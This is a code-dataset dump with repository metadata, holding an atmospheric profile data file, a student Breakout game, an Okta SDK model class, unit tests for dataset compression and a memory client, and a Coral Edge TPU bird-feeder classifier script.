0.06263239, 0.06350083, 0.06423774, 0.06476787, 0.06481747,
0.06471838, 0.06458966, 0.06447546, 0.06438733, 0.06432344,
0.06428367, 0.06423741, 0.0641983 , 0.06589368, 0.07015209,
0.07475692, 0.0797395 , 0.08513432, 0.09097941, 0.09731644,
0.1041912 ])
self["T"] = numpy.array([ 189.265, 197.336, 211.688, 227.871, 242.446, 252.765,
259.432, 262.908, 263.411, 262.202, 261.422, 259.368,
255.095, 250.075, 244.792, 239.205, 235.817, 231.46 ,
227.966, 225.935, 225.115, 222.382, 219.723, 218.152,
217.875, 218.211, 218.288, 218.294, 217.949, 217.202,
216.158, 214.964, 215.259, 215.053, 215.409, 216.081,
216.441, 216.152, 215.427, 215.082, 216.198, 217.247,
217.006, 216.373, 216.342, 217.088, 218.419, 219.839,
220.797, 220.946, 221.423, 222.504, 223.822, 225.134,
226.221, 226.93 , 227.275, 227.405, 227.434, 227.346,
227.212, 227.246, 227.566, 228.2 , 229.083, 230.094,
231.117, 232.121, 233.086, 234.01 , 235.064, 236.351,
237.928, 239.892, 242.039, 244.306, 246.651, 249.025,
251.415, 253.802, 256.16 , 258.448, 260.591, 262.445,
264.071, 265.349, 266.233, 266.969, 267.78 , 268.72 ,
269.42 , 270.502, 271.421, 273.317, 273.317, 273.317,
273.317, 273.317, 273.317, 273.317, 273.317])
self["N2O"] = numpy.array([ 0.00161 , 0.00187 , 0.00205999, 0.00220999, 0.00233999,
0.00235999, 0.00157999, 0.00186999, 0.00519997, 0.00870995,
0.00838995, 0.00955994, 0.01208993, 0.01432992, 0.0171399 ,
0.02172988, 0.02788985, 0.03756981, 0.04630977, 0.05168975,
0.05680973, 0.05922973, 0.06028973, 0.06131974, 0.07010971,
0.07957968, 0.08867964, 0.09929961, 0.1101496 , 0.1206295 ,
0.1301795 , 0.1371795 , 0.1439595 , 0.1505294 , 0.1651494 ,
0.1848693 , 0.2034792 , 0.2285391 , 0.252299 , 0.2748389 ,
0.2840589 , 0.2926288 , 0.3004188 , 0.3072488 , 0.3129187 ,
0.3172487 , 0.3200187 , 0.3209987 , 0.3209987 , 0.3209987 ,
0.3209986 , 0.3209984 , 0.3209982 , 0.3209978 , 0.3209973 ,
0.3209968 , 0.3209964 , 0.320996 , 0.3209956 , 0.320995 ,
0.3209943 , 0.3209938 , 0.3209936 , 0.3209936 , 0.3209939 ,
0.3209941 , 0.3209941 , 0.3209941 , 0.3209935 , 0.3209896 ,
0.3209797 , 0.3209647 , 0.3209449 , 0.3209225 , 0.3209021 ,
0.3208842 , 0.32087 , 0.3208663 , 0.3208701 , 0.3208845 ,
0.3209016 , 0.3209026 , 0.3208633 , 0.3207191 , 0.3204841 ,
0.320189 , 0.3198736 , 0.3195881 , 0.3193787 , 0.319266 ,
0.3192201 , 0.3191182 , 0.3190395 , 0.3188072 , 0.31887 ,
0.3189301 , 0.3189878 , 0.3190431 , 0.3190962 , 0.3191472 ,
0.3191962 ])
self["O3"] = numpy.array([ 0.1903137 , 0.2192386 , 0.3077081 , 0.5440408 , 0.8590299 ,
1.170854 , 1.499102 , 1.864289 , 2.273556 , 2.805293 ,
3.409769 , 4.028786 , 4.806182 , 5.619898 , 6.411164 ,
7.147361 , 7.51202 , 7.648961 , 7.644362 , 7.556123 ,
7.446574 , 7.281136 , 6.952659 , 6.604492 , 6.296854 ,
6.008776 , 5.751387 , 5.520268 , 5.311749 , 5.111921 ,
4.890092 , 4.593293 , 4.298724 , 3.882905 , 3.380027 ,
2.799559 , 2.288161 , 2.031152 , 2.018272 , 2.047542 ,
1.969722 , 1.685453 , 1.220825 , 0.9176053 , 0.8929574 ,
0.9542592 , 1.004996 , 1.034796 , 1.031726 , 1.019046 ,
0.8797071 , 0.6484178 , 0.4105526 , 0.2529783 , 0.1943934 ,
0.201197 , 0.2459162 , 0.322179 , 0.3977806 , 0.4292413 ,
0.4255834 , 0.3930204 , 0.3461121 , 0.2989281 , 0.2606191 ,
0.2321107 , 0.2069452 , 0.1838146 , 0.1618567 , 0.1410414 ,
0.1225313 , 0.1061913 , 0.09214328, 0.08133816, 0.07293074,
0.06636085, 0.06143102, 0.05859298, 0.05740586, 0.05732126,
0.05783027, 0.05809797, 0.05651443, 0.05019414, 0.0404447 ,
0.03280082, 0.02944741, 0.02902179, 0.02945348, 0.02918976,
0.02836743, 0.02750451, 0.02608958, 0.02225294, 0.02225732,
0.02226152, 0.02226555, 0.02226941, 0.02227312, 0.02227668,
0.02228009])
self["CH4"] = numpy.array([ 0.1059488, 0.1201298, 0.1306706, 0.1417254, 0.1691352,
0.209023 , 0.2345078, 0.2578465, 0.2845033, 0.328699 ,
0.3987896, 0.4800421, 0.5668716, 0.6510682, 0.7280449,
0.7954147, 0.8518465, 0.8903115, 0.9281374, 0.9731752,
1.016085 , 1.071595 , 1.131985 , 1.189835 , 1.247015 ,
1.302185 , 1.355285 , 1.400504 , 1.442154 , 1.464494 ,
1.488464 , 1.514124 , 1.541544 , 1.560774 , 1.579304 ,
1.596804 , 1.612894 , 1.627174 , 1.638294 , 1.650024 ,
1.662373 , 1.675353 , 1.688973 , 1.722213 , 1.729283 ,
1.736683 , 1.741733 , 1.745103 , 1.749093 , 1.755483 ,
1.762122 , 1.770021 , 1.77847 , 1.785498 , 1.790785 ,
1.795642 , 1.79793 , 1.800308 , 1.800506 , 1.800632 ,
1.800498 , 1.800295 , 1.800414 , 1.800704 , 1.800856 ,
1.800867 , 1.800517 , 1.799787 , 1.798434 , 1.796372 ,
1.794017 , 1.791393 , 1.789133 , 1.787118 , 1.785875 ,
1.784886 , 1.784827 , 1.785476 , 1.788046 , 1.791395 ,
1.795229 , 1.798224 , 1.800263 , 1.801052 , 1.800931 ,
1.80036 , 1.799234 , 1.797877 , 1.796739 , 1.796035 ,
1.795827 , 1.795294 , 1.79488 , 1.793604 , 1.793966 ,
1.794315 , 1.794639 , 1.794951 , 1.795249 , 1.795536 ,
1.795812 ])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 273.317
self["S2M"]["Q"] = 5619.26541873
self["S2M"]["O"] = 0.022280094739
self["S2M"]["P"] = 905.85559
self["S2M"]["U"] = 0.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 0
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 273.317
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 0.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = 45.309
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([2007, 4, 1])
self["TIME"] = numpy.array([0, 0, 0])
| 57.508621
| 92
| 0.570979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 462
| 0.034627
|
0cfdd69003365202954e59ba474c596cdd274c91
| 10,386
|
py
|
Python
|
stanCode_Projects/break_out_game/breakoutgraphics.py
|
kunyi1022/sc-projects
|
0ab0019b2cdc86c434a0acff39b862263dcbc970
|
[
"MIT"
] | null | null | null |
stanCode_Projects/break_out_game/breakoutgraphics.py
|
kunyi1022/sc-projects
|
0ab0019b2cdc86c434a0acff39b862263dcbc970
|
[
"MIT"
] | null | null | null |
stanCode_Projects/break_out_game/breakoutgraphics.py
|
kunyi1022/sc-projects
|
0ab0019b2cdc86c434a0acff39b862263dcbc970
|
[
"MIT"
] | null | null | null |
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
File: breakoutgraphics.py
Name: 林坤毅 Jordan
-------------------------
This python file will create a class named BreakoutGraphics for the break out game.
This class will contain the building block for creating that game.
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
class BreakoutGraphics:
def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
title='Breakout'):
"""
The basic parameters for building these breakout game.
:param ball_radius: The radius of the ball.
:param paddle_width: The width of the paddle.
:param paddle_height: The height of the paddle.
:param paddle_offset: The distance between paddle and the bottom of the window.
:param brick_rows: The number of rows in bricks.
:param brick_cols: The number of column in bricks.
:param brick_width: The width of each brick.
:param brick_height: The height of each brick.
:param brick_offset: The distance between the first row of bricks and the top of the window.
:param brick_spacing: The spacing between each brick.
:param title: The name of this program.
"""
# Create a graphical window, with some extra space
self.window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
self.window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=self.window_width, height=self.window_height, title=title)
# Create a paddle
self.paddle = GRect(paddle_width, paddle_height, x=(self.window_width-paddle_width)/2, y=(self.window_height-paddle_offset))
self.paddle.filled = True
self.paddle.color = 'black'
self.paddle.fill_color = 'black'
self.window.add(self.paddle)
self.paddle_width = paddle_width
self.paddle_height = paddle_height
self.paddle_offset = paddle_offset
# Center a filled ball in the graphical window
self.ball = GOval(ball_radius*2, ball_radius*2, x=(self.window_width-ball_radius*2)/2, y=(self.window_height-ball_radius*2)/2)
self.ball.filled = True
self.ball.fill_color = 'black'
self.window.add(self.ball)
self.ball_radius = ball_radius
# Default initial velocity for the ball
self.__dx = 0 # self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = 0 # self.__dy = INITIAL_Y_SPEED
# if random.random() > 0.5:
# self.__dx = -self.__dx
# The above is the mistake I made during doing this homework.
# Draw bricks
for i in range(brick_cols):
for j in range(brick_rows):
# Crucial point! This can't be placed at the outside of for loop.
brick = GRect(brick_width, brick_height)
brick.x = (brick_width+brick_spacing)*i
brick.y = brick_offset+(brick_height+brick_spacing)*j
brick.filled = True
if j < 2:
brick.fill_color = 'red'
elif j < 4:
brick.fill_color = 'orange'
elif j < 6:
brick.fill_color = 'yellow'
elif j < 8:
brick.fill_color = 'green'
elif j < 10:
brick.fill_color = 'blue'
elif j < 12:
brick.fill_color = 'teal'
elif j < 14:
brick.fill_color = 'chocolate'
self.window.add(brick)
# Initialize our mouse listeners
onmouseclicked(self.is_start_game)
onmousemoved(self.moving_paddle)
# Total bricks
self.total_bricks = brick_cols * brick_rows
def is_start_game(self, event): # Crucial point!!! Stuck here for three days! The initial velocity!
"""
The check point of the game start.
:param event: The information of the mouse, including (x,y) of it.
:return: Set the __dx and __dy of the ball.
"""
if event.x != -1 and event.y != -1 and self.__dx == 0 and self.__dy == 0:
self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = INITIAL_Y_SPEED
if random.random() > 0.5:
self.__dx = -self.__dx
def check_for_collisions(self):
"""
Four check points of the ball to check the collision with objects.
:return: boolean value. Build the information of object that the ball collide with.
"""
one = self.window.get_object_at(self.ball.x, self.ball.y)
two = self.window.get_object_at(self.ball.x + 2*self.ball_radius, self.ball.y)
three = self.window.get_object_at(self.ball.x, self.ball.y + 2*self.ball_radius)
four = self.window.get_object_at(self.ball.x + 2*self.ball_radius, self.ball.y + 2*self.ball_radius)
if one is not None:
self.obj = self.window.get_object_at(self.ball.x, self.ball.y)
return True
elif two is not None:
self.obj = self.window.get_object_at(self.ball.x + 2*self.ball_radius, self.ball.y)
return True
elif three is not None:
self.obj = self.window.get_object_at(self.ball.x, self.ball.y + 2*self.ball_radius)
return True
elif four is not None:
self.obj = self.window.get_object_at(self.ball.x + 2*self.ball_radius, self.ball.y + 2*self.ball_radius)
return True
def check_object_type(self):
"""
The objects above the half of the window height are bricks and the object below the half of the window height is paddle.
:return: boolean value. Bricks return True and paddle returns False.
"""
if self.ball.y > self.window.height/2:
return True
else:
return False
def moving_ball(self):
"""
The method for moving ball.
:return: The moving result of the ball.
"""
self.ball.move(self.__dx, self.__dy)
def moving_paddle(self, event):
"""
The method for moving paddle.
:param event: The information of the mouse, including (x,y) of it.
:return: The moving result of the paddle.
"""
if event.x - self.paddle_width/2 >= 0 and event.x-self.paddle_width/2 <= self.window_width-self.paddle_width:
self.paddle.x = event.x - self.paddle_width / 2
def reset_ball(self):
"""
As the ball falls below the paddle and the game hasn't overed, the ball will be reset to the original position.
:return: The ball at the original position.
"""
self.ball = GOval(self.ball_radius * 2, self.ball_radius * 2, x=(self.window_width - self.ball_radius * 2) / 2,
y=(self.window_height - self.ball_radius * 2) / 2)
self.ball.filled = True
self.ball.fill_color = 'black'
self.window.add(self.ball)
self.ball_radius = self.ball_radius
self.__dx = 0
self.__dy = 0
def set_dx(self, new_dx):
"""
Set the new __dx.
:param new_dx: The new dx.
:return: __dx.
"""
self.__dx = new_dx
def set_dy(self, new_dy):
"""
Set the new __dy.
:param new_dy: The new dy.
:return: __dy.
"""
self.__dy = new_dy
def get_dx(self):
"""
Get the information of __dx from class BreakoutGraphics.
:return: The __dx for the ball.
"""
return self.__dx
def get_dy(self):
"""
Get the information of __dy from class BreakoutGraphics.
:return: The __dy for the ball.
"""
return self.__dy
def set_dx_collision(self, new_dx):
"""
Set the new __dx for ball after colliding with bricks.
:param new_dx: The new dx.
:return: __dx.
"""
if random.random() > 0.5:
self.__dx = new_dx
else:
self.__dx = -new_dx
def game_over(self):
"""
The label for game over.
:return: The label for game over.
"""
label = GLabel('Game Over!!!')
# The condition below is for 10*10 bricks.
# If coder change the number of rows or columns, the size would probably not fit.
label.font = '-40'
self.window.add(label, x= self.window_width/2 - 100, y=self.window_height/2 + 100)
def game_win(self):
"""
The label for game win.
:return: The label for game win.
"""
label = GLabel('You Win!!!')
# The condition below is for 10*10 bricks.
# If coder change the number of rows or columns, the size would probably not fit.
label.font = '-40'
self.window.add(label, x=self.window_width / 2 - 100, y=self.window_height / 2 + 100)
| 39.192453
| 134
| 0.604756
| 9,028
| 0.868745
| 0
| 0
| 0
| 0
| 0
| 0
| 4,380
| 0.421478
|
0cfe0c2510332685f3cc3783752192ba32a124ab
| 329
|
py
|
Python
|
PythonExercicios/ex020.py
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
0045464a287f21b6245554a975588cf06c5b476d
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex020.py
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
0045464a287f21b6245554a975588cf06c5b476d
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex020.py
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
0045464a287f21b6245554a975588cf06c5b476d
|
[
"MIT"
] | null | null | null |
from random import shuffle
a1 = str(input('Digite o nome de um aluno: '))
a2 = str(input('Digite o nome de outro aluno: '))
a3 = str(input('Digite o nome de mais outro aluno: '))
a4 = str(input('Digite o nome do último aluno: '))
lista = [a1, a2, a3, a4]
shuffle(lista)
print(f'A ordem de apresentação é: \033[34m{lista}\033[m')
| 36.555556
| 58
| 0.680851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 186
| 0.558559
|
4901c51c1ea8530e44c195ecd1215f420a39da2d
| 3,940
|
py
|
Python
|
okta/models/profile_enrollment_policy_rule_action.py
|
ander501/okta-sdk-python
|
0927dc6a2f6d5ebf7cd1ea806d81065094c92471
|
[
"Apache-2.0"
] | null | null | null |
okta/models/profile_enrollment_policy_rule_action.py
|
ander501/okta-sdk-python
|
0927dc6a2f6d5ebf7cd1ea806d81065094c92471
|
[
"Apache-2.0"
] | null | null | null |
okta/models/profile_enrollment_policy_rule_action.py
|
ander501/okta-sdk-python
|
0927dc6a2f6d5ebf7cd1ea806d81065094c92471
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
"""
Copyright 2021 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.okta_object import OktaObject
from okta.okta_collection import OktaCollection
from okta.models import profile_enrollment_policy_rule_activation_requirement\
as profile_enrollment_policy_rule_activation_requirement
from okta.models import pre_registration_inline_hook\
as pre_registration_inline_hook
from okta.models import profile_enrollment_policy_rule_profile_attribute\
as profile_enrollment_policy_rule_profile_attribute
class ProfileEnrollmentPolicyRuleAction(
OktaObject
):
"""
A class for ProfileEnrollmentPolicyRuleAction objects.
"""
def __init__(self, config=None):
super().__init__(config)
if config:
self.access = config["access"]\
if "access" in config else None
if "activationRequirements" in config:
if isinstance(config["activationRequirements"],
profile_enrollment_policy_rule_activation_requirement.ProfileEnrollmentPolicyRuleActivationRequirement):
self.activation_requirements = config["activationRequirements"]
elif config["activationRequirements"] is not None:
self.activation_requirements = profile_enrollment_policy_rule_activation_requirement.ProfileEnrollmentPolicyRuleActivationRequirement(
config["activationRequirements"]
)
else:
self.activation_requirements = None
else:
self.activation_requirements = None
self.pre_registration_inline_hooks = OktaCollection.form_list(
config["preRegistrationInlineHooks"] if "preRegistrationInlineHooks"\
in config else [],
pre_registration_inline_hook.PreRegistrationInlineHook
)
self.profile_attributes = OktaCollection.form_list(
config["profileAttributes"] if "profileAttributes"\
in config else [],
profile_enrollment_policy_rule_profile_attribute.ProfileEnrollmentPolicyRuleProfileAttribute
)
self.target_group_ids = OktaCollection.form_list(
config["targetGroupIds"] if "targetGroupIds"\
in config else [],
str
)
self.unknown_user_action = config["unknownUserAction"]\
if "unknownUserAction" in config else None
else:
self.access = None
self.activation_requirements = None
self.pre_registration_inline_hooks = []
self.profile_attributes = []
self.target_group_ids = []
self.unknown_user_action = None
def request_format(self):
parent_req_format = super().request_format()
current_obj_format = {
"access": self.access,
"activationRequirements": self.activation_requirements,
"preRegistrationInlineHooks": self.pre_registration_inline_hooks,
"profileAttributes": self.profile_attributes,
"targetGroupIds": self.target_group_ids,
"unknownUserAction": self.unknown_user_action
}
parent_req_format.update(current_obj_format)
return parent_req_format
| 42.826087
| 154
| 0.679949
| 2,831
| 0.718528
| 0
| 0
| 0
| 0
| 0
| 0
| 1,136
| 0.288325
|
490301996f235103083f9f733d639e25da1a8a52
| 1,478
|
py
|
Python
|
test/test_compression.py
|
Peter42/iasi
|
fc799d542c2bb80c3f559bc2f9e833ac330a5506
|
[
"MIT"
] | null | null | null |
test/test_compression.py
|
Peter42/iasi
|
fc799d542c2bb80c3f559bc2f9e833ac330a5506
|
[
"MIT"
] | 3
|
2019-05-02T12:49:21.000Z
|
2019-06-12T09:11:00.000Z
|
test/test_compression.py
|
Peter42/iasi
|
fc799d542c2bb80c3f559bc2f9e833ac330a5506
|
[
"MIT"
] | 1
|
2019-10-18T21:33:33.000Z
|
2019-10-18T21:33:33.000Z
|
import datetime
import unittest
import luigi
import numpy as np
from netCDF4 import Dataset
from iasi.compression import (CompressDataset, CompressDateRange,
DecompressDataset)
class TestCompression(unittest.TestCase):
def test_dataset_compression(self):
task = CompressDataset(
file='test/resources/MOTIV-single-event.nc',
dst='/tmp/iasi',
force=True,
threshold=0.01,
log_file=False
)
assert luigi.build([task], local_scheduler=True)
with Dataset(task.output().path) as nc:
state = nc['state']
subgroups = state.groups.keys()
self.assertListEqual(
list(subgroups), ['GHG', 'HNO3', 'Tatm', 'Tskin', 'WV'])
def test_dataset_decompression(self):
task = DecompressDataset(
file='test/resources/MOTIV-single-event.nc',
dst='/tmp/iasi',
force=True,
log_file=False,
compress_upstream=True
)
success = luigi.build([task], local_scheduler=True)
self.assertTrue(success)
class TestDateInterval(unittest.TestCase):
def test_date_range(self):
# end date is not inclusive
interval = luigi.date_interval.Custom.parse('2016-06-01-2016-06-30')
task = CompressDateRange(date_interval=interval, dst='/tmp/iasi', src='test/resources')
luigi.build([task], local_scheduler=True)
| 30.791667
| 95
| 0.614344
| 1,263
| 0.854533
| 0
| 0
| 0
| 0
| 0
| 0
| 210
| 0.142084
|
4905009d57cff19e66575a7bfdba66a5dbebafe6
| 6,310
|
py
|
Python
|
bird_classify.py
|
google-coral/project-birdfeeder
|
3bcb9bfd4123a0c6f16a09087a8ccdfe0c6dd80e
|
[
"Apache-2.0"
] | 26
|
2019-07-23T22:32:08.000Z
|
2022-01-09T15:15:50.000Z
|
bird_classify.py
|
hjonnala/project-birdfeeder
|
4375a9370d7567b756b6cc68f4dfcb4c8183b118
|
[
"Apache-2.0"
] | 13
|
2019-07-26T17:10:48.000Z
|
2022-03-01T04:11:48.000Z
|
bird_classify.py
|
hjonnala/project-birdfeeder
|
4375a9370d7567b756b6cc68f4dfcb4c8183b118
|
[
"Apache-2.0"
] | 19
|
2019-11-05T03:01:31.000Z
|
2022-03-29T01:13:46.000Z
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python3
"""
Coral Smart Bird Feeder
Uses ClassificationEngine from the EdgeTPU API to analyze animals in
camera frames. Sounds a deterrent if a squirrel is detected.
Users define model, labels file, storage path, deterrent sound, and
optionally can set this to training mode for collecting images for a custom
model.
"""
import argparse
import time
import logging
from PIL import Image
from playsound import playsound
from pycoral.utils.dataset import read_label_file
from pycoral.utils.edgetpu import make_interpreter
from pycoral.adapters import common
from pycoral.adapters.classify import get_classes
import gstreamer
def save_data(image, results, path, ext='png'):
"""Saves camera frame and model inference results
to user-defined storage directory."""
tag = '%010d' % int(time.monotonic()*1000)
name = '%s/img-%s.%s' % (path, tag, ext)
image.save(name)
print('Frame saved as: %s' % name)
logging.info('Image: %s Results: %s', tag, results)
def print_results(start_time, last_time, end_time, results):
"""Print results to terminal for debugging."""
inference_rate = ((end_time - start_time) * 1000)
fps = (1.0/(end_time - last_time))
print('\nInference: %.2f ms, FPS: %.2f fps' % (inference_rate, fps))
for label, score in results:
print(' %s, score=%.2f' % (label, score))
def do_training(results, last_results, top_k):
"""Compares current model results to previous results and returns
true if at least one label difference is detected. Used to collect
images for training a custom model."""
new_labels = [label[0] for label in results]
old_labels = [label[0] for label in last_results]
shared_labels = set(new_labels).intersection(old_labels)
if len(shared_labels) < top_k:
print('Difference detected')
return True
return False
def user_selections():
parser = argparse.ArgumentParser()
parser.add_argument('--model', required=True,
help='.tflite model path')
parser.add_argument('--labels', required=True,
help='label file path')
parser.add_argument('--videosrc', help='Which video source to use', default='/dev/video0')
parser.add_argument('--top_k', type=int, default=3,
help='number of classes with highest score to display')
parser.add_argument('--threshold', type=float, default=0.1,
help='class score threshold')
parser.add_argument('--storage', required=True,
help='File path to store images and results')
parser.add_argument('--sound', required=True,
help='File path to deterrent sound')
parser.add_argument('--print', default=False, required=False,
help='Print inference results to terminal')
parser.add_argument('--training', action='store_true',
help='Training mode for image collection')
args = parser.parse_args()
return args
def main():
"""Creates camera pipeline, and pushes pipeline through ClassificationEngine
model. Logs results to user-defined storage. Runs either in training mode to
gather images for custom model creation or in deterrent mode that sounds an
'alarm' if a defined label is detected."""
args = user_selections()
print("Loading %s with %s labels." % (args.model, args.labels))
interpreter = make_interpreter(args.model)
interpreter.allocate_tensors()
labels = read_label_file(args.labels)
input_tensor_shape = interpreter.get_input_details()[0]['shape']
if (input_tensor_shape.size != 4 or
input_tensor_shape[0] != 1):
raise RuntimeError(
'Invalid input tensor shape! Expected: [1, height, width, channel]')
output_tensors = len(interpreter.get_output_details())
if output_tensors != 1:
raise ValueError(
('Classification model should have 1 output tensor only!'
'This model has {}.'.format(output_tensors)))
storage_dir = args.storage
# Initialize logging file
logging.basicConfig(filename='%s/results.log' % storage_dir,
format='%(asctime)s-%(message)s',
level=logging.DEBUG)
last_time = time.monotonic()
last_results = [('label', 0)]
def user_callback(image, svg_canvas):
nonlocal last_time
nonlocal last_results
start_time = time.monotonic()
common.set_resized_input(
interpreter, image.size, lambda size: image.resize(size, Image.NEAREST))
interpreter.invoke()
results = get_classes(interpreter, args.top_k, args.threshold)
end_time = time.monotonic()
play_sounds = [labels[i] for i, score in results]
results = [(labels[i], score) for i, score in results]
if args.print:
print_results(start_time, last_time, end_time, results)
if args.training:
if do_training(results, last_results, args.top_k):
save_data(image, results, storage_dir)
else:
# Custom model mode:
# The labels can be modified to detect/deter user-selected items
if len(results):
if results[0][0] != 'background':
save_data(image, results, storage_dir)
if FOX_SQUIRREL_LABEL in play_sounds:
playsound(args.sound)
logging.info('Deterrent sounded')
last_results = results
last_time = end_time
gstreamer.run_pipeline(user_callback, videosrc=args.videosrc)
if __name__ == '__main__':
FOX_SQUIRREL_LABEL = 'fox squirrel, eastern fox squirrel, Sciurus niger'
main()
| 38.711656
| 94
| 0.666878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,463
| 0.390333
|
4906781740f98be4911b2335a3c4e24bb2089146
| 2,959
|
py
|
Python
|
memory/test/test_memory.py
|
MaxGreil/hail
|
4e0605b6bfd24a885a8194e8c0984b20994d3407
|
[
"MIT"
] | 789
|
2016-09-05T04:14:25.000Z
|
2022-03-30T09:51:54.000Z
|
memory/test/test_memory.py
|
MaxGreil/hail
|
4e0605b6bfd24a885a8194e8c0984b20994d3407
|
[
"MIT"
] | 5,724
|
2016-08-29T18:58:40.000Z
|
2022-03-31T23:49:42.000Z
|
memory/test/test_memory.py
|
MaxGreil/hail
|
4e0605b6bfd24a885a8194e8c0984b20994d3407
|
[
"MIT"
] | 233
|
2016-08-31T20:42:38.000Z
|
2022-02-17T16:42:39.000Z
|
import unittest
import uuid
from memory.client import MemoryClient
from hailtop.aiocloud.aiogoogle import GoogleStorageAsyncFS
from hailtop.config import get_user_config
from hailtop.utils import async_to_blocking
from gear.cloud_config import get_gcp_config
PROJECT = get_gcp_config().project
class BlockingMemoryClient:
def __init__(self, gcs_project=None, fs=None, deploy_config=None, session=None, headers=None, _token=None):
self._client = MemoryClient(gcs_project, fs, deploy_config, session, headers, _token)
async_to_blocking(self._client.async_init())
def _get_file_if_exists(self, filename):
return async_to_blocking(self._client._get_file_if_exists(filename))
def read_file(self, filename):
return async_to_blocking(self._client.read_file(filename))
def write_file(self, filename, data):
return async_to_blocking(self._client.write_file(filename, data))
def close(self):
return async_to_blocking(self._client.close())
class Tests(unittest.TestCase):
def setUp(self):
bucket_name = get_user_config().get('batch', 'bucket')
token = uuid.uuid4()
self.test_path = f'gs://{bucket_name}/memory-tests/{token}'
self.fs = GoogleStorageAsyncFS(project=PROJECT)
self.client = BlockingMemoryClient(fs=self.fs)
self.temp_files = set()
def tearDown(self):
async_to_blocking(self.fs.rmtree(None, self.test_path))
self.client.close()
async def add_temp_file_from_string(self, name: str, str_value: bytes):
handle = f'{self.test_path}/{name}'
async with await self.fs.create(handle) as f:
await f.write(str_value)
return handle
def test_non_existent(self):
for _ in range(3):
self.assertIsNone(self.client._get_file_if_exists(f'{self.test_path}/nonexistent'))
def test_small_write_around(self):
async def read(url):
async with await self.fs.open(url) as f:
return await f.read()
cases = [('empty_file', b''), ('null', b'\0'), ('small', b'hello world')]
for file, data in cases:
handle = async_to_blocking(self.add_temp_file_from_string(file, data))
expected = async_to_blocking(read(handle))
self.assertEqual(expected, data)
i = 0
cached = self.client._get_file_if_exists(handle)
while cached is None and i < 10:
cached = self.client._get_file_if_exists(handle)
i += 1
self.assertEqual(cached, expected)
def test_small_write_through(self):
cases = [('empty_file2', b''), ('null2', b'\0'), ('small2', b'hello world')]
for file, data in cases:
filename = f'{self.test_path}/{file}'
self.client.write_file(filename, data)
cached = self.client._get_file_if_exists(filename)
self.assertEqual(cached, data)
| 36.085366
| 111
| 0.663738
| 2,656
| 0.897601
| 0
| 0
| 0
| 0
| 341
| 0.115242
| 237
| 0.080095
|
49078fb3338a8d88957f2187faa7b3d0420743af
| 990
|
py
|
Python
|
feladatok.py
|
python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado
|
0528125ec429584b21a41635517a3c55dfba559a
|
[
"CC0-1.0"
] | null | null | null |
feladatok.py
|
python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado
|
0528125ec429584b21a41635517a3c55dfba559a
|
[
"CC0-1.0"
] | null | null | null |
feladatok.py
|
